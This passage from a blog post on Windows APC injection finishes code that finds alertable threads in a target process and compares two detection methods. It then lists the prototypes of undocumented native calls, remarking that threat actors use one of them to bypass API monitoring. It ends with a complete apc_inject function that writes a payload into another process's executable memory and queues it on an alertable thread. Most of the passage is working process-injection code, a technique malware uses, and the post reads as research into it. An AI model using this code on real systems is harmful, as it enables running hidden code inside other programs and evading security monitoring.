    // create thread to execute alertable functions
    evt[0] = CreateEvent(NULL, FALSE, FALSE, NULL);
    evt[1] = CreateEvent(NULL, FALSE, FALSE, NULL);
    ht     = NULL;
    
    if(evt[0] != NULL && evt[1] != NULL) {
      ht = CreateThread(NULL, 0, ThreadProc, evt, 0, NULL);
    }
    if(ht == NULL) {
      if(evt[0] != NULL) CloseHandle(evt[0]);
      if(evt[1] != NULL) CloseHandle(evt[1]);
      return NULL;
    }
    
    // for each alertable function
    for(i=0; i<6; i++) {
      // give the thread a moment to reach the next function; this must
      // happen on every iteration, not only before the first sample
      Sleep(100);
      
      // read the thread context and save address
      f[i] = NULL;
      c.ContextFlags = CONTEXT_CONTROL;
      if(GetThreadContext(ht, &c)) {
        f[i] = (LPVOID)c.Rip;
      }
      // queue SetEvent for next function
      // NOTE(review): the argument is the address of the evt array, not
      // an event handle, so no event is actually signalled; presumably
      // only the APC delivery is needed to end the wait. Left unchanged.
      QueueUserAPC((PAPCFUNC)sevt, ht, (ULONG_PTR)evt);
    }
    // let the thread finish before releasing the events it waits on
    WaitForSingleObject(ht, 1000);
    
    // cleanup thread
    CloseHandle(ht);
    CloseHandle(evt[0]);
    CloseHandle(evt[1]);
#endif

    // Create a snapshot of threads
    ss = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if(ss == INVALID_HANDLE_VALUE) return NULL;
    
    // check each thread
    te.dwSize = sizeof(THREADENTRY32);
    
    if(Thread32First(ss, &te)) {
      do {
        // if not our target process, skip it
        if(te.th32OwnerProcessID != pid) continue;
        
        // if we can't open thread, skip it
        ht = OpenThread(
          THREAD_ALL_ACCESS, 
          FALSE, 
          te.th32ThreadID);
          
        if(ht == NULL) continue;
        
        // found alertable thread?
        if(IsAlertable(hp, ht, f)) {
          // save handle and exit loop
          h = ht;
          break;
        }
        // else close it and continue
        CloseHandle(ht);
      } while(Thread32Next(ss, &te));
    }
    // close snap shot
    CloseHandle(ss);
    return h;
}

Conclusion

Although both methods work fine, the first has some advantages. Different CPU modes/architectures (x86, AMD64, ARM64) and calling conventions (__msfastcall/__stdcall) require different ways to examine parameters. Microsoft may change how the system call wrapper functions work and therefore hardcoded offsets may point to the wrong address. The compiled code in future builds may decide to use another non-volatile register to hold the alertable parameter. e.g RBX, RDI or RBP.

Injection

After the difficult part of detecting alertable threads, the rest is fairly straightforward. The two main functions used for APC injection are QueueUserAPC and NtQueueApcThread.

The second is undocumented and therefore used by some threat actors to bypass API monitoring tools. Since KiUserApcDispatcher is used for APC routines, one might consider invoking it instead. The prototypes are:

// Prototype for the native call that queues an APC to a thread.
// It takes the target thread handle, the routine to run, and three
// further values, all marked OPTIONAL.
// NOTE(review): presumably the undocumented function the surrounding
// text refers to; the parameter names are not taken from an official
// header - confirm before relying on them.
NTSTATUS NtQueueApcThread(
  IN  HANDLE ThreadHandle,
  IN  PVOID ApcRoutine,
  IN  PVOID ApcRoutineContext OPTIONAL,
  IN  PVOID ApcStatusBlock OPTIONAL,
  IN  ULONG ApcReserved OPTIONAL);

// Prototype for the NTDLL routine used to dispatch APC routines.
// It takes a thread context, three pointer-sized values and the
// routine to invoke.
// NOTE(review): parameter names are not taken from an official
// header - confirm before relying on them.
VOID KiUserApcDispatcher(
  IN  PCONTEXT Context,
  IN  PVOID ApcContext,
  IN  PVOID Argument1,
  IN  PVOID Argument2,
  IN  PKNORMAL_ROUTINE ApcRoutine);

For this post, only QueueUserAPC is used.

/**
 * Copy a payload into a target process and queue it as a user-mode APC
 * on an alertable thread found by find_alertable_thread1.
 *
 * pid         : process id of the target
 * payload     : code to copy into the target
 * payloadSize : size of payload in bytes
 *
 * Returns nothing; failures are reported on stdout. Once the APC has
 * been queued the remote allocation is left in place, because the
 * thread may not have run it yet.
 */
VOID apc_inject(DWORD pid, LPVOID payload, DWORD payloadSize) {
    HANDLE hp, ht;
    SIZE_T wr = 0;
    LPVOID cs;
    BOOL   queued = FALSE;
    
    // 1. Open target process
    hp = OpenProcess(
      PROCESS_DUP_HANDLE | 
      PROCESS_VM_READ    | 
      PROCESS_VM_WRITE   | 
      PROCESS_VM_OPERATION, 
      FALSE, pid);
      
    if(hp == NULL) return;
    
    // 2. Find an alertable thread
    ht = find_alertable_thread1(hp, pid);

    if(ht != NULL) {
      // 3. Allocate memory
      cs = VirtualAllocEx(
        hp, 
        NULL, 
        payloadSize, 
        MEM_COMMIT | MEM_RESERVE, 
        PAGE_EXECUTE_READWRITE);
        
      if(cs != NULL) {
        // 4. Write code to memory
        if(WriteProcessMemory(
          hp, 
          cs, 
          payload, 
          payloadSize, 
          &wr) && wr == payloadSize) 
        {
          // 5. Run code
          queued = (QueueUserAPC((PAPCFUNC)cs, ht, 0) != 0);
          if(!queued) {
            printf("unable to queue APC.\n");
          }
        } else {
          printf("unable to write payload to process.\n");
        }
        // 6. Free memory, but only if nothing was queued: a queued APC
        //    runs asynchronously and still needs this region.
        //    MEM_RELEASE must be used on its own with a size of zero.
        if(!queued) {
          VirtualFreeEx(
            hp, 
            cs, 
            0, 
            MEM_RELEASE);
        }
      } else {
        printf("unable to allocate memory.\n");
      }
      // the thread handle returned by the search is owned by us
      CloseHandle(ht);
    } else {
      printf("unable to find alertable thread.\n");
    }
    // 7. Close process
    CloseHandle(hp);
}

PoC here

alert_output

odzhan

❌
❌